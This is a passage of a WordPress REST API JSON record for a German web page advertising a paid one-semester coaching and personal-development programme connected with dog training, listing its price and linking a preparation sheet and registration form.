https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2018\/10\/steingaden3-1024x682.jpg 1024w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2018\/10\/steingaden3-1080x720.jpg 1080w, https:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2018\/10\/steingaden3.jpg 2000w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/h4>\n<h4><strong>Kosten<\/strong><\/h4>\n<p>2.400 EUR<\/p>\n<p>Zahlbar in einem Betrag<\/p>\n<p>Oder 420 EUR pro Monat \u00fcber 6 Monate<\/p>\n<p>&nbsp;<\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1677\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\" alt=\"pdf\" width=\"30\" height=\"28\" \/><\/a>\u00a0<a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2017\/03\/Vorbereitungsbogen.pdf\">Vorbereitungsbogen<\/a><\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1677\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\" alt=\"pdf\" width=\"30\" height=\"28\" \/><\/a><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/Anmeldeformular-2022-1.pdf\">Anmeldeformular 2022<\/a><\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p><div class=\"et_pb_section et_pb_section_0 et_section_regular\" >\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t<\/div><div class=\"et_pb_row et_pb_row_0 et_pb_row_empty\">\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t<\/div> 1\u00a0Semester Coaching \/ Pers\u00f6nlichkeitsentwicklung mit Hubert Asam Als Entwicklungsbegleitung f\u00fcr den Hund bekommt bei diesem Coaching der Mensch die M\u00f6glichkeit, sich innerhalb der Natur weiterzubilden und zu lernen. Ein Angebot an die, die die Entwicklung ihres Hundes\u00a0 professionell begleitet sehen wollen. Dieses Angebot richtet sich auch an Menschen, die beruflich im Personalmanagement, Coaching oder [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"class_list":["post-1817","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/pages\/1817","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1817"}],"version-history":[{"count":40,"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/pages\/1817\/revisions"}],"predecessor-version":[{"id":4427,"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/pages\/1817\/revisions\/4427"}],"wp:attachment":[{"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1817"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}